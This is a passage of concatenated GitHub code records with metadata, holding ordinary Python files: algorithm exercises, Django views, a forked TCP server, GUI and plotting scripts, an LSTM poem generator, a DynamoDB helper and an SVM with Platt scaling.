**kwargs)\n","repo_name":"allanz1221/plataforma-diagnostico","sub_path":"diagnostico_project/documents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20867641407","text":"#그리디 기출문제 - 곱하기 혹은 더하기 (chapter11-02)\n\n#문자열 S는 띄어쓰기 없이 문자열로 받기\ns = input()\n\n# 결과값 초기화\nresult = int(s[0])\n\n#문자열의 값을 하나씩 읽어나가며 값 구하기\nfor i in range(len(s)):\n num = int(s[i])\n #0과 1이 아닌 모든 경우에 대해서는 곱하기의 값이 더 크다\n if num<=1 or result<=1:\n result+=num\n else:\n result*=num\n\nprint(result)","repo_name":"giraffejin/Algorithm","sub_path":"Thisiscodingtest/Greedy/MultiplyOrAdd.py","file_name":"MultiplyOrAdd.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72929801446","text":"#encoding: utf-8\n\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic import ListView, DetailView\nfrom models import Produto, CategoriaProduto\n\nclass ProdutoListView(ListView):\n\n template_name = 'produtos/index.html'\n paginate_by = 10\n\n def get_context_data(self, **kwargs):\n context = super(ProdutoListView, self). get_context_data(**kwargs)\n context['categoria'] = CategoriaProduto.objects.all()\n context['album'] = Produto.objects.all()\n return context\n\n def get_queryset(self):\n produto = Produto.objects.filter(publico=True)\n searchproduto = self.request.GET.get('searchproduto')\n searchcategoria = self.request.GET.get('searchcategoria') \n \n if searchproduto and searchcategoria:\n produto = Produto.objects.filter(nome__icontains=searchproduto, categoria__nome__icontains=searchcategoria) \n return produto\n else:\n if not searchproduto and not searchcategoria:\n produto = Produto.objects.filter(publico=True) \n return produto\n else:\n if not searchproduto and searchcategoria:\n produto = Produto.objects.filter(categoria__nome__icontains=searchcategoria) \n return produto\n else:\n if not searchproduto:\n produto = Produto.objects.filter(categoria__icontains=searchcategoria) \n return produto\n else:\n if not searchcategoria:\n produto = Produto.objects.filter(nome__icontains=searchproduto) \n return produto\n\nclass ProdutoDetailView(DetailView):\n \n template_name = 'produtos/detalhes.html'\n context_object_name = 'produto'\n \n def get_queryset(self): \n if not self.request.user.is_authenticated():\n return Produto.objects.filter(publico=True)\n return Produto.objects.all()\n","repo_name":"oeiselino/projeto_site","sub_path":"produtos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13607909585","text":"#\n# Example file for working with loops\n#\n\ndef main():\n x = 0\n\n # define a while loop\n while(x <5):\n print(x)\n x = x + 1\n\n\n # define a for loop\n for x in range(5,10): #start at 5 and stop at 10\n print(x)\n\n\n # use a for loop over a collection\n days= [\"Mon\", \"Tue\", \"Wed\", \"Thu\", \"Fri\", \"Sat\", \"Sun\"]\n #d will be set to the current item that looking at that time through the loop\n for d in days:\n print(d)\n\n \n # use the break and continue statements\n for x in range(5,10):\n #if(x == 7): break\n if(x % 2 == 0): continue #continue = skip rest of the loop and just go back to the top of the loop and start with next value\n print(x)\n\n\n #using the enumerate() function to get index \n days= [\"Mon\", \"Tue\", \"Wed\", \"Thu\", \"Fri\", \"Sat\", \"Sun\"]\n #enumerate will return two values which are the index number of the element and the element itself\n for i,d in enumerate(days):\n print(i,d)\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"lydia0423/Machine_Learning","sub_path":"Python/Python Basic/Lynda.com/Learning Python/Exercise/Ch2/loops_start.py","file_name":"loops_start.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21679502059","text":"# main.py\n'''\n项目主流程控制模块\n'''\nimport sys, os\nimport traceback\nimport signal\nfrom socket import *\nsys.path.append('/Users/guolei/Desktop')\n\nfrom microblog.microblog.conf import conf\nfrom microblog.microblog.msg import msgdecoder\nfrom microblog.microblog.deal import msgdeal\n\n\ncf = conf.ConfigReader('../config.ini')\nserverconfig = cf.getdic(\"server\")\nmysqlconfig = cf.getdic(\"mysql\")\n\n#初始化数据库\ndef init_database():\n\tdatabase = mysqlconfig.get(\"database\")\n\tif not isExsits(database):\n\t\tinit_tables()\n\n\ndef getsocket(host, port):\n\taddr = (host, port)\n\ts = socket()\n\ts.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n\ts.bind(addr)\n\ts.listen(10)\n\treturn s\n\ndef server_start(host, port, buffersize):\n\tprint(\"服务器端开始启动\")\n\n\ttry:\n\t\t#初始化数据库\n\t\t#检查数据库是否存在\n\t\t#不存在则执行建库建表语句,存在则无需动作\n\t\t# initdatabase()\n\t\ts = getsocket(host, port)\n\t\tsignal.signal(signal.SIGCHLD, signal.SIG_IGN)\n\t\tprint(\"服务器端启动成功\")\n\texcept Exception as e:\n\t\ttraceback.print_exc()\n\t\tprint(\"服务器端启动失败\")\n\t\treturn\n\n\twhile True:\n\t\ttry:\n\t\t\tc, addr = s.accept()\n\t\t\tprint(\"conn from :\", addr)\n\t\texcept KeyboardInterrupt:\n\t\t\tprint(\"服务端退出\")\n\t\t\ts.close()\n\t\t\tsys.exit(0)\n\t\texcept Exception:\n\t\t\tcontinue\n\n\t\tpid = os.fork()\n\t\tif pid < 0:\n\t\t\tprint(\"创建子进程失败\")\n\t\t\tc.close()\n\t\t\tcontinue\n\t\telif pid == 0:\n\t\t\ts.close()\n\n\t\t\t#创建业务处理对象\n\t\t\tdeal = msgdeal.MsgDeal(c)\n\t\t\t#创建客户端通信对象\n\t\t\twhile True:\n\t\t\t#接收客户端的请求类型\n\t\t\t\t#获接收请求的总长度,5个字节为长度位\n\t\t\t\tdata_size = int(c.recv(5).decode())\n\t\t\t\t#收到的总长度\n\t\t\t\trecv_size = 0\n\t\t\t\ttotal_data = \"\"\n\t\t\t\twhile recv_size < data_size:\n\t\t\t\t\tdata = c.recv(buffersize).decode()\n\t\t\t\t\tif 0 < data_size - len(data) < buffersize:\n\t\t\t\t\t\tleft_data = c.recv(data_size - len(data)).decode()\n\t\t\t\t\t\ttotal_data += left_data\n\t\t\t\t\ttotal_data += data\n\t\t\t\t\trecv_size += len(data)\n\t\t\t\t\n\t\t\t\t# print(\"收到报文体为 :\", total_data)\n\t\t\t\t#解析xml报文\n\t\t\t\tmsgdict = msgdecoder.decode_msg_to_dict(total_data)\n\t\t\t\tprint(\"交易报文的字典为:\", msgdict)\n\t\t\t\t#获取报文的交易类型\n\t\t\t\t# transtype = msgdict.get(\"transType\",\"没有此交易类型\")\n\t\t\t\t\n\t\t\t\tdeal.deal(msgdict)\n\n\t\t\t\t# if msgtype == '1001':\n\t\t\t\t# \tprint(\"我要登录\")\n\t\t\t\t# \tpass\n\t\t\t\t# elif msgtype == '1002':\n\t\t\t\t# \tprint(\"我要注册\")\n\t\t\t\t# \tpass\n\t\t\t\t# elif msgtype == '1003':\n\t\t\t\t# \tpass\n\t\t\t\t# elif data[0] == '1004':\n\t\t\t\t# \tpass\n\t\t\t\t\n\n\t\telse:\n\t\t\tc.close()\n\t\t\tcontinue\n\n\n# def server_stop(pid):\n# \tos.kill(pid, signal.SIGKILL)\n\n#服务器主流程控制函数\ndef main():\n\tif len(sys.argv) < 2:\n\t\tprint(\"cmd is error , pls use:\")\n\t\tprint(\"'python3 server.py start' or 'python3 server.py stop'\")\n\t\treturn\n\n\t#获取服务器配置\n\t\n\thost = serverconfig.get(\"host\")\n\tport = int(serverconfig.get(\"port\"))\n\tbuffersize = int(serverconfig.get(\"buffersize\"))\n\tpid = os.getpid()\n\n\tif sys.argv[1] == 'start':\n\t\tserver_start(host, port, buffersize)\n\t# elif sys.argv[1] == 'stop':\n\n\t# \tserver_stop(pid)\n\telse:\n\t\tprint(\"cmd is error , pls use:\")\n\t\tprint(\"'python3 server.py start' or 'python3 server.py stop'\")\n\t\treturn\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n\tmain()\n\n\t\n\n\n\n\n\n\n","repo_name":"kep-w/Microblog_PyQt5_TCP_MySQL","sub_path":"server/microblog/server_fork.py","file_name":"server_fork.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"39241490040","text":"\r\n\r\nclass dict_process:\r\n\r\n def __init__(self,fname,lname,age,fullname,address,skillset):\r\n self.fname=fname\r\n self.lname=lname\r\n self.age=age\r\n self.fullname=fullname\r\n self.address=address\r\n self.skillset=skillset\r\n\r\n \r\n @classmethod\r\n\r\n def d_process(cls,dict):\r\n fname=dict['fname']\r\n lname=dict['lname']\r\n age=dict['age']\r\n fullname=dict['fullname']\r\n address=dict['address']\r\n skillset=dict['skillset']\r\n return dict_process(fname,lname,age,fullname,address,skillset) \r\n\r\ndict={'fname': 'indhu', 'lname': 'mathy', 'age': 25, 'fullname': 'indhu mathy', 'address': {'city': 'chennai', 'state': 'TN', 'zip': '627117'}, 'skillset': ['Python', 'SQL', 'Tableau', 'AWS']}\r\ns=dict_process.d_process(dict)\r\nprint (s.address)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"IndhumathyChelliah/PythonProject","sub_path":"Simple Programs-solutions/soln2.py","file_name":"soln2.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"6098578207","text":"import sys\nfrom PyQt6 import QtCore\nfrom PyQt6.QtCore import *\nfrom PyQt6.QtWidgets import *\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nimport matplotlib.animation as animation\nimport numpy as np\n\n\nfrom utils import getmylogger \nfrom utils import ZMQReceiver\n\nlog = getmylogger(__name__)\n\nplt.style.use('dark_background')\n\n\nclass MainWindow(QWidget):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.title = \"Plot\"\n # Set up the main window\n self.setWindowTitle(self.title)\n self.setMinimumSize(300, 300)\n\n # Create GUI Layout\n self.layout = QGridLayout()\n self.layout.setContentsMargins(10, 10, 10, 10)\n self.setLayout(self.layout)\n\n # Create the widget\n plotWidget = MatplotlibWidget(self, )\n self.layout.addWidget(plotWidget)\n\n self.initSignals()\n\n\n def initSignals(self):\n self.signals = [{\n \"Name\": \"\",\n \"Value\": 0,\n \"Format\": \":x\" #value after frist : delim\n }]\n\n\nclass MatplotlibWidget(QWidget):\n def __init__(self, parent=None):\n super(MatplotlibWidget, self).__init__(parent)\n self.topic = \"\"\n self.subAddr = 'ipc://SHARED' \n\n\n # Create a figure and axis for the plot\n self.x_len = 200\n self.y_range = [-2,2]\n self.fig = plt.figure()\n self.ax = self.fig.add_subplot(1,1,1)\n\n self.canvas = FigureCanvas(self.fig)\n # Create the ZMQ Receiver Thread\n self.receiver = ZMQReceiver(self.topic, self.subAddr)\n self.receiver.socketDataSig.connect(self._updateData)\n self.receiver.start()\n\n # Create a layout to hold the plot\n layout = QVBoxLayout()\n layout.addWidget(self.canvas)\n self.setLayout(layout)\n\n # Initialize the plot\n self.xs = list(range(0,self.x_len))\n self.ys = [0] * self.x_len\n self.y2s = [0] * self.x_len\n self.ax.set_ylim(self.y_range)\n self.line, = self.ax.plot(self.xs, self.ys, label = \"roll\")\n self.line2, = self.ax.plot(self.xs, self.y2s, label = \"avg\")\n self.ax.legend()\n self.animation = animation.FuncAnimation(self.fig,self.animate,fargs=(self.ys,self.y2s),interval=16,blit=True,cache_frame_data=False)\n \n @QtCore.pyqtSlot(str)\n def _updateData(self, msg):\n #@Breif: Gets called vis Qt Slot when new data received over ZMQ\n try:\n yval = float(msg.split(\":\")[0])\n avg = self.moving_average(yval, 2)\n self.ys.append(yval)\n self.y2s.append(avg[0])\n except Exception as e:\n log.error(e)\n \n def animate(self, i, ys, y2s):\n #@Breif: gets called by Matplotlib funcAdimate loop\n # Update the plot with new data\n # Limit y list to set number of items\n self.ys = self.ys[-self.x_len:]\n self.y2s = self.y2s[-self.x_len:]\n # Update line with new Y values\n self.line.set_ydata(self.ys)\n self.line2.set_ydata(self.y2s)\n return self.line, self.line2\n\n def moving_average(self, data, window_size):\n return np.convolve(data, np.ones(window_size)/window_size, mode='valid')\n\n\n\ndef main():\n app = QApplication(sys.argv)\n main_window = MainWindow()\n main_window.show()\n sys.exit(app.exec())\n\nif __name__ == '__main__':\n main()\n","repo_name":"Wrodders/dBot","sub_path":"Tools/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32123007419","text":"# Yêu cầu:\n# 1. nhập n\n# 2. nhập n phần tử\n# 3. đếm người bị béo phì\n\n# |CHƯƠNG TRÌNH CHÍNH|\nn = int(input())\n\nds = []\n\nfor i in range(0, n, 1):\n chieu_cao = float(input())\n can_nang = float(input())\n\n item = [chieu_cao, can_nang]\n\n ds.append(item)\n\ndem_BeoPhi = 0\n\n# hàm tính BMI\ndef Ham_Tinh_BMI(chieu_cao, can_nang):\n return can_nang / (chieu_cao**2)\n\nfor i in range(0, n, 1):\n if Ham_Tinh_BMI(ds[i][0], ds[i][1]) >= 30:\n dem_BeoPhi = dem_BeoPhi + 1\n\nprint(dem_BeoPhi)","repo_name":"conggaro/Hoc_Python","sub_path":"Nhập môn khoa học máy tính/Tuần 9/Bài thực hành lập trình tuần 9 ___ cơ bản/Lần 2/cau_hoi_5.py","file_name":"cau_hoi_5.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22133670903","text":"\n#!/usr/bin/env python3\n\nfrom tkinter import *\n\nroot = Tk()\nroot.title(\"My GUI application\")\nroot.geometry(\"500x200+400+200\")\n\nlabel = Label(root, text=\"Type your name!\")\nlabel.pack()\n\nentry = Entry(root)\nentry.pack()\n\ndef saveName():\n\tfile = open(\"name.txt\", \"a\")\n\tfile.write(\"%s\\n\" % entry.get())\n\tentry.delete(0, END)\n\nbutton = Button(root, text=\"Save\", command = saveName)\nbutton.pack()\n\nroot.mainloop()\n","repo_name":"AcornPublishing/python3-for-hacker","sub_path":"14-10.py","file_name":"14-10.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34185255570","text":"from xml.etree import cElementTree as et\n\nfrom mt_metadata.base.helpers import write_lines, element_to_string\nfrom mt_metadata.base import get_schema, Base\nfrom .standards import SCHEMA_FN_PATHS\nfrom mt_metadata.transfer_functions.io.emtfxml.metadata import helpers\n\n# =============================================================================\nattr_dict = get_schema(\"orientation\", SCHEMA_FN_PATHS)\n# =============================================================================\n\n\nclass Orientation(Base):\n __doc__ = write_lines(attr_dict)\n\n def __init__(self, **kwargs):\n\n super().__init__(attr_dict=attr_dict, **kwargs)\n\n def read_dict(self, input_dict):\n \"\"\"\n\n :param input_dict: DESCRIPTION\n :type input_dict: TYPE\n :return: DESCRIPTION\n :rtype: TYPE\n\n \"\"\"\n element_dict = {self._class_name: input_dict[self._class_name]}\n if isinstance(element_dict[self._class_name], str):\n element_dict[self._class_name] = {\n \"layout\": element_dict[self._class_name]\n }\n\n self.from_dict(element_dict)\n\n def to_xml(self, string=False, required=True):\n \"\"\"\n Overwrite to XML to follow EMTF XML format\n\n :param string: DESCRIPTION, defaults to False\n :type string: TYPE, optional\n :param required: DESCRIPTION, defaults to True\n :type required: TYPE, optional\n :return: DESCRIPTION\n :rtype: TYPE\n\n \"\"\"\n\n if self.layout == \"orthogonal\":\n if self.angle_to_geographic_north is None:\n self.angle_to_geographic_north = 0.0\n root = et.Element(\n self.__class__.__name__.capitalize(),\n {\n \"angle_to_geographic_north\": f\"{self.angle_to_geographic_north:.3f}\"\n },\n )\n root.text = self.layout\n else:\n root = et.Element(self.__class__.__name__.capitalize())\n root.text = self.layout\n\n if not string:\n return root\n else:\n return element_to_string(root)\n","repo_name":"kujaku11/mt_metadata","sub_path":"mt_metadata/transfer_functions/io/emtfxml/metadata/orientation.py","file_name":"orientation.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"52"} +{"seq_id":"39262038943","text":"import pytest\nimport numpy as np\nfrom lasagne.layers import GlobalPoolLayer\nfrom lasagne.layers import InputLayer\nimport theano.tensor as T\n\nfrom foolbox.models import LasagneModel\n\n\n@pytest.mark.parametrize('num_classes', [10, 1000])\ndef test_lasagne_model(num_classes):\n bounds = (0, 255)\n channels = num_classes\n\n def mean_brightness_net(images):\n logits = GlobalPoolLayer(images)\n return logits\n\n images_var = T.tensor4('images')\n images = InputLayer((None, channels, 5, 5), images_var)\n logits = mean_brightness_net(images)\n\n model = LasagneModel(\n images,\n logits,\n bounds=bounds)\n\n test_images = np.random.rand(2, channels, 5, 5).astype(np.float32)\n test_label = 7\n\n assert model.batch_predictions(test_images).shape \\\n == (2, num_classes)\n\n test_logits = model.predictions(test_images[0])\n assert test_logits.shape == (num_classes,)\n\n test_gradient = model.gradient(test_images[0], test_label)\n assert test_gradient.shape == test_images[0].shape\n\n np.testing.assert_almost_equal(\n model.predictions_and_gradient(test_images[0], test_label)[0],\n test_logits)\n np.testing.assert_almost_equal(\n model.predictions_and_gradient(test_images[0], test_label)[1],\n test_gradient)\n\n assert model.num_classes() == num_classes\n","repo_name":"AlexMikhalev/foolbox","sub_path":"foolbox/tests/test_models_lasagne.py","file_name":"test_models_lasagne.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"12673414430","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Author : LEITENG\n@Version : \n------------------------------------\n@File : p67_poem.py\n@Description : \n@CreateTime : 2020/7/25 18:55\n------------------------------------\n@ModifyTime : 诗歌生成\n\"\"\"\nimport p50_framework as myf\nfrom p48_BufferDS import BufferDS\nfrom p66_read_qts import QTS\nimport tensorflow as tf\nimport numpy as np\n\n\nclass MyConfig(myf.Config):\n def __init__(self):\n super(MyConfig, self).__init__()\n self.qts_path = './texts/qts.txt'\n self._ds = None\n\n # 输入向量长度\n self.num_units = 200\n # 循环次数\n self.num_steps = 32\n # 批次\n self.batch_size = 100\n\n def ds(self):\n '''\n 去获取 bufferds 对象\n :return:\n '''\n self.make_ds()\n return self._ds\n\n def make_ds(self):\n if self._ds is None:\n qts = QTS(self.qts_path)\n self._ds = BufferDS(1000, qts, self.batch_size)\n # 中文字符的个数\n self._num_chinese_chars = qts.get_num_chars()\n\n def num_chinese_chars(self):\n self.make_ds()\n return self._num_chinese_chars\n\n def get_ds_train(self):\n return self.ds()\n\n def get_ds_test(self):\n return self.get_ds_train()\n\n def get_name(self):\n return 'p67'\n\n def get_sub_tensors(self, gpu_id):\n return MySubTensors(self)\n\n\nclass MySubTensors:\n def __init__(self, cfg: MyConfig):\n self.config = cfg\n\n x = tf.placeholder(tf.int64, [None, cfg.num_steps], 'x') # [-1, 32]\n self.inputs = [x]\n\n x = tf.one_hot(x, cfg.num_chinese_chars()) # [-1, 32, 4340]\n y = tf.layers.dense(x, cfg.num_units, name='dense1') # [-1, 32, 200]\n\n cell = tf.nn.rnn_cell.LSTMCell(cfg.num_units, name='cell')\n state = cell.zero_state(tf.shape(y)[0], y.dtype)\n y_predict = []\n losses = []\n with tf.variable_scope('for') as scope:\n for i in range(cfg.num_steps):\n yi, state = cell(y[:, i, :], state) # [-1, 200]\n\n logits = tf.layers.dense(yi, cfg.num_chinese_chars(), name='dense2')\n y_predict.append(logits)\n\n if i < cfg.num_steps - 1:\n # 32 个输出\n # 让当前的 logits 与下一次的输入计算交叉熵\n loss = tf.nn.softmax_cross_entropy_with_logits_v2(labels=x[:, i+1, :], logits=logits)\n losses.append(loss)\n scope.reuse_variables()\n\n self.losses = [tf.reduce_mean(losses)]\n\n\nif __name__ == '__main__':\n cfg = MyConfig()\n cfg.from_cmd()","repo_name":"provenclei/tensorflow_cv","sub_path":"deeplearning_tensorflow_p/p67_poem.py","file_name":"p67_poem.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"24789018494","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 27 23:05:42 2017\n\n@author: Ivan Luchko (luchko.ivan@gmail.com)\n\n2D oscillation: matplotlib animation manager usage example \n\"\"\" \nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_animationmanager import AnimationManager\n\n\ndef fAnim(i, ax, fargs):\n '''define modification animation function'''\n line, tdata, ydata = fargs\n line.set_data(tdata[:i], ydata[:i])\n\n\ndef get_animManager():\n \"\"\"Return axample of configured AnimationManager instance\"\"\"\n \n NUM_STEPS = 400\n STEP = 0.05\n\n fig = plt.figure('2D oscillation example') \n ax = fig.gca()\n ax.set_ylim(-1.1, 1.1)\n ax.set_xlim(0, STEP*NUM_STEPS)\n ax.grid()\n \n line, = ax.plot([], [], lw=2)\n tdata = [STEP*i for i in range(NUM_STEPS)]\n ydata = [np.sin(2*np.pi*t) * np.exp(-t/5.) for t in tdata]\n \n # pass figure to animation manager\n mng = AnimationManager(ax, fAnim=fAnim, fargs=(line, tdata, ydata), \n numFramesModif=NUM_STEPS)\n # set some initial parameters\n mng.dlg.spinBox_period_modif.setValue(10)\n\n return mng\n \n\ndef run():\n \"\"\"run example\"\"\"\n \n mng = get_animManager()\n \n return mng.run()\n \n \nif __name__ == '__main__':\n sys.exit(run())","repo_name":"luchko/mpl_animationmanager","sub_path":"mpl_animationmanager/examples/oscillation_2D.py","file_name":"oscillation_2D.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"52"} +{"seq_id":"35636602209","text":"from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer,Image\nfrom reportlab.lib.styles import getSampleStyleSheet,ParagraphStyle\nfrom reportlab.rl_config import defaultPageSize\nfrom reportlab.lib.units import inch\nfrom reportlab.lib.pagesizes import letter \nfrom reportlab.lib.enums import TA_CENTER,TA_JUSTIFY\n\ndocument=[]\ndocument.append(Image('tools-64.png',2.2*inch,2.2*inch))\n\n\ndef addTitle(doc):\n \n style = getSampleStyleSheet() \n doc.append(Spacer(1,20))\n doc.append(Paragraph('Bla bla',ParagraphStyle('Name', alignment=TA_CENTER,\n fontFamily='Helvetica',fontSize=36))) \n \n doc.append(Spacer(1,50))\n return(doc)\n\ndef addParagraphs(doc):\n lsValores=[('1', 'wwww', '5555'), ('2', 'ggggg', '3333'), ('3', 'eeeee', '77777')] \n for valor in lsValores:\n print(valor[0])\n #ERRO\n #doc.append(Paragraph())\n #doc.append(Paragraph('''XXXXXXXXXXXXXX'''))\n doc.append(Spacer(1,20))\n return(doc) \n\ndocument= addTitle(document)\n\nSimpleDocTemplate('nomeDoc.pdf',pagesize=letter,rightMargin=12,\n leftMargin=12,\n bottomMargin=6).build(addParagraphs(document)) ","repo_name":"FerGVargas/Dev.Full_Stack","sub_path":"Mundo 1/Missão Certificação/estudos/gerarPDF/lendoTxt2 debugar.py","file_name":"lendoTxt2 debugar.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"32111047859","text":"budget = float(input())\nprice_flour = float(input())\nprice_eggs = 0.75 * price_flour\nprice_milk = 1.25 * price_flour\nloaves = 0\nprice_per_loaf = price_flour + price_eggs + 0.25 * price_milk\ncount_loaves = 0\ncolored_eggs = 0\n\nwhile budget > price_per_loaf:\n count_loaves += 1\n colored_eggs += 3\n if count_loaves % 3 == 0:\n colored_eggs -= count_loaves - 2\n budget -= price_per_loaf\n\n\nprint(f\"You made {count_loaves} loaves of Easter bread! Now you have {colored_eggs} eggs and {budget:.2f}BGN left.\")","repo_name":"pepapopova/SoftUni-Courses","sub_path":"Fundamentals/Basic Syntax, Conditional Statements and Loops/easter_bread.py","file_name":"easter_bread.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13776911522","text":"from __future__ import print_function # Python 2/3 compatibility\nimport boto3\n\n\n\nclass DynamoDBTest:\n\n def __init__(self):\n self._dynamodb = boto3.resource('dynamodb', region_name='ap-northeast-1', endpoint_url=\"http://localhost:8000\")\n\n\n def _create_table(self):\n table = self._dynamodb.create_table(\n TableName='Order',\n KeySchema=[\n {\n 'AttributeName': 'order_id',\n 'KeyType': 'HASH' #Partition key\n },\n {\n 'AttributeName': 'ts',\n 'KeyType': 'RANGE' #Sort key\n }\n ],\n AttributeDefinitions=[\n {\n 'AttributeName': 'order_id',\n 'AttributeType': 'N'\n },\n {\n 'AttributeName': 'ts',\n 'AttributeType': 'S'\n },\n\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 10,\n 'WriteCapacityUnits': 10\n }\n )\n\n return table\n\n\n def _delete_table(self):\n table = self._dynamodb.Table('Order')\n\n table.delete()\n","repo_name":"pkr06/AWS","sub_path":"dynamodb.py","file_name":"dynamodb.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3957916561","text":"# 일곱난쟁이 (IM 대비문제 1)\ndef dfs(y, total):\n if total == 100 and visited.count(True) == 7:\n if not ans: # 한번만 출력\n for i in range(len(heights)):\n if visited[i]:\n ans.append(heights[i])\n return\n\n if y >= 9 or total > 100:\n return\n\n visited[y] = True\n dfs(y + 1, total + heights[y])\n visited[y] = False\n dfs(y + 1, total)\n\nheights = []\nfor i in range(9):\n heights.append(int(input()))\nvisited = [False] * len(heights)\nans = []\ndfs(0, 0)\nans = sorted(ans)\nfor a in ans:\n print(a)","repo_name":"hybae430/Baekjoon","sub_path":"2309.py","file_name":"2309.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33992051878","text":"# Simple SVM\nimport numpy as np\nfrom scipy.optimize import minimize\nfrom scipy.special import expit\n\nfrom tqdm import tqdm\n\nfrom itertools import combinations\n\n\nclass SVC:\n\n def __init__(self, C=1, kernel=None, tol=1e-5):\n self.kernel = kernel\n self.C = C\n\n self.X = None\n self.y = None\n\n self.alpha = None\n self.b = None\n\n self.scale = None\n\n self.tol = tol\n\n self.X_multi = None\n\n self.alpha_multi = None\n self.b_multi = None\n\n self.scale_multi = None\n\n self.nb_class = None\n\n def fit(self, X, y):\n self.b = 0\n\n N = len(y)\n hXX = self.kernel(X, X)\n G = np.einsum('ij,i,j->ij', hXX, y, y)\n A = np.vstack((-np.eye(N), np.eye(N)))\n b = np.hstack((np.zeros(N), self.C * np.ones(N)))\n\n def loss(alpha):\n return -alpha.sum() + 0.5 * alpha.dot(alpha.dot(G))\n\n def grad_loss(alpha):\n return -np.ones_like(alpha) + alpha.dot(G)\n\n fun_eq = lambda alpha: np.dot(alpha, y)\n jac_eq = lambda alpha: y\n fun_ineq = lambda alpha: b - np.dot(A, alpha)\n jac_ineq = lambda alpha: -A\n\n constraints = ({'type': 'eq', 'fun': fun_eq, 'jac': jac_eq},\n {'type': 'ineq',\n 'fun': fun_ineq,\n 'jac': jac_ineq})\n\n optRes = minimize(fun=lambda alpha: loss(alpha),\n x0=np.random.normal(size=N),\n method='SLSQP',\n jac=lambda alpha: grad_loss(alpha),\n constraints=constraints)\n self.alpha = optRes.x\n\n margin_pointsIndices = self.alpha > self.tol\n boundaryIndices = (self.alpha > self.tol) * (self.C - self.alpha > self.tol)\n self.X = X[margin_pointsIndices]\n self.y = y[margin_pointsIndices]\n self.alpha = y[margin_pointsIndices] * self.alpha[margin_pointsIndices]\n self.b = y[boundaryIndices][0] - \\\n self.separating_function(np.expand_dims(X[boundaryIndices][0], axis=0))\n\n self._platt_fit()\n\n def separating_function(self, x):\n x1 = self.kernel(self.X, x)\n return np.einsum('ij,i->j', x1, self.alpha) + self.b\n\n def predict(self, X):\n d = self.separating_function(X)\n return 2 * (d + self.b > 0) - 1\n\n def _platt_fit(self):\n mylog = lambda x: 0 if x == 0 else np.log(x)\n sigmoid = lambda x, param1, param2: expit(-(x * param1 + param2))\n\n out = self.separating_function(self.X)\n L = self.y\n target = L == 1\n prior1 = np.float64(np.sum(target))\n prior0 = len(target) - prior1\n\n A = 0\n B = np.log((prior0 + 1) / (prior1 + 1))\n hiTarget = (prior1 + 1) / (prior1 + 2)\n loTarget = 1 / (prior0 + 2)\n labda = 1e-3\n olderr = 1e300\n\n pp = np.ones(out.shape) * (prior1 + 1) / (prior0 + prior1 + 2)\n\n T = np.zeros(target.shape)\n for _ in range(1, 200):\n a, b, c, d, e = 0, 0, 0, 0, 0\n for i in range(len(out)):\n if target[i]:\n t = hiTarget\n T[i] = t\n else:\n t = loTarget\n T[i] = t\n d1, d2 = pp[i] - t, pp[i] * (1 - pp[i])\n\n a += out[i] * out[i] * d2\n b += d2\n c += out[i] * d2\n d += out[i] * d1\n e += d1\n if abs(d) < 1e-9 and abs(e) < 1e-9:\n break\n oldA, oldB = A, B\n err, count = 0, 0\n while True:\n det = (a + labda) * (b + labda) - c * c\n if det == 0:\n labda *= 10\n A = oldA + ((b + labda) * d - c * e) / det\n B = oldB + ((a + labda) * e - c * 